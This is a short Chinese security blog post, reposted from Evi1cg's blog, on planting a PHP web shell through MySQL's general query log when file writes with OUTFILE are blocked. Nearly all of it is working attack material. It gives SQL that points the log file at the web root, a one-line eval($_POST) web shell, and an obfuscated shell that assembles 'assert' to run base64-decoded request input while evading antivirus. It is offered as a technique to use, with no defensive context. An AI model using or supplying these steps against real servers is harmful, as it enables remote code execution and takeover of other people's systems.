SQL语句利用日志写shell

华盟原创文章投稿奖励计划

outfile被禁止,或者写入文件被拦截;

数据库中操作如下:(必须是root权限)

show variables like '%general%';  #查看配置

set global general_log = on;  #开启general log模式

set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址

select '<?php eval($_POST[cmd]);?>'  #写入shell


SQL查询免杀shell的语句


SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_='a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"


文章出处:Evi1cg's blog   

原文链接:

华盟知识星球入口

https://evi1cg.me/archives/test1.html

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/251569.html

发表评论